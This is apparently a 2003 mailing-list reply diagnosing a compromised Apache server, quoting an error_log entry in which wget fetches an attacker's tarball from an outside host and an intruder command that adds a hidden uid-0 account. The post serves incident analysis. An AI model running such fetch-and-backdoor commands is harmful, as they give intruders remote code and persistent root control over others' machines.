On Thu, Sep 04, 2003 at 12:43:07AM +0800, Marco Lum wrote:
Follows found in error_log of apache
--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100% 13.69 KB/s
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
Wget output in apache error_log. Check for a CGI (shell script?) allowing clients to execute arbitrary commands.
Also Found his command history:
id /usr/sbin/adduser vulturul -u0 -g0 -M;
He has root access but is not shure about that?
At least two problems. Execution of commands as user wwwrun and
local root compromise.
I hope the box has been disconnectet from the network already.
--
Stefan Tichy